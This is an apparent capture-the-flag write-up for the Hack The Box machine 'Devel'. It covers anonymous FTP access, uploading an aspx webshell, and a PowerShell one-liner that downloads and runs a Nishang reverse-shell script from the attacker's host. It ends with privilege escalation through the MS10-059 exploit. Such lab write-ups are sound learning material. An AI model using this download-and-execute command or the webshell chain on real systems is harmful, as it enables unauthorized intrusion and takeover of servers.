# 🕵 HTB-Writeup : DEVEL
## Recon
**nmap**
```shell=
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM
aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```
Windows machine with Microsoft IIS webserver v7.5.
**Dirbuster**
Dirbuster scan don't find any directories or files.
Tested extensions:
- php
- txt
- xml
- sh
- asp
- html
**ftp server**
As the `ftp-anon` script from nmap show, we can connect into the ftp server with the anonymous user.
```shell=
└─$ ftp anonymous@10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>
```
But we can't find any interesting files.
Since we can't find any directories or files, I manage to try to find vulnerabilities on the FTP server.
Firstly I download all files I can from anonymous connection. No interesting files.
```shell=
└─$ wget -m --no-passive ftp://anonymous:anonymous@10.10.10.5
└─$ tree 10.10.10.5
10.10.10.5
├── aspnet_client
│  └── system_web
│  └── 2_0_50727
├── iisstart.htm
└── welcome.png
```
I try to bruteforce accounts from nmap nse scripts. No results.
```shell=
└─$ nmap --script ftp-* -p 21 10.10.10.5
| ftp-brute:
| Accounts: No valid accounts found
|_ Statistics: Performed 50009 guesses in 317 seconds, average tps: 145.0
```
Re-checking downloaded files, I realize that I have missed an important information. The IIS webserver use this FTP server. When trying to navigate to `http://10.10.10.5/aspnet_client/` we get an access denied, so the FTP server is using a IIS server.
## Vulnerabilities
Knowing that, we can try to upload file to get a reverse shell.
I upload an `aspx` webshell on the ftp to try to execute powershell commands. The webshell can be found at `/usr/share/webshells/aspx/cmdasp.aspx` on a Kali Linux.
Then, I prepare the **nishang** reverse powershell script that can be found [at this link](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1).
Adding the following line to the bottom of the script with our IP and port.
```ps1=
Invoke-PowerShellTcp.ps1 -Reverse -IPAddress -Port `
```
Then, I up a python http server with our powershell script. On the webshell, we download and execute our script
```shell=
# on aspx command prompt
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://:/Invoke-PowerShellTcp.ps1')"
```
*Command injection on the form*
*Response on our host*
It works! We get a reverse shell!
```shell=
Windows PowerShell running as user DEVEL$ on DEVEL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv>
Directory: C:\windows\system32\inetsrv
PS C:\windows\system32\inetsrv> whoami
iis apppool\web
```
We can get the user flag. Let's go to the privesc!
## privesc
I first get the content of `systeminfo` and pass it into the [Windows-Exploit-Suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester) tool.
```sh
└─$ python2 ../TOOLS/Windows-Exploit-Suggester/windows-exploit-suggester.py -d 2022-08-21-mssb.xls -i sysinfo -l
[*] initiating winsploit version 3.3...
[*] comparing the 0 hotfix(es) against the 179 potential bulletins(s) with a database of 137 known exploits
[*] searching for local exploits only
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[*] done
```
It gaves me 3 potentials vulnerabilities. I found [this github](https://github.com/abatchy17/WindowsExploits) that list multiple Windows exploit, I try the third one listed by our tool (**MS10-059**).
The **MS10-059** vulnerability allow an attacker to run code with elevated privileges. It exploit incorrect access control lists (ACLs) on the registry keys for the Tracing Feature for Services.
I download the program on the machine with a smb share, then I executed it.
*Commands executed on the target*
We get another reverse shell ! This time with system privileges!
*Reverse shell gain on the host*
## Tags
Easy, External, Network, IIS, ASP, Penetration Tester Level 2, Remote Code Execution, Unrestricted File Upload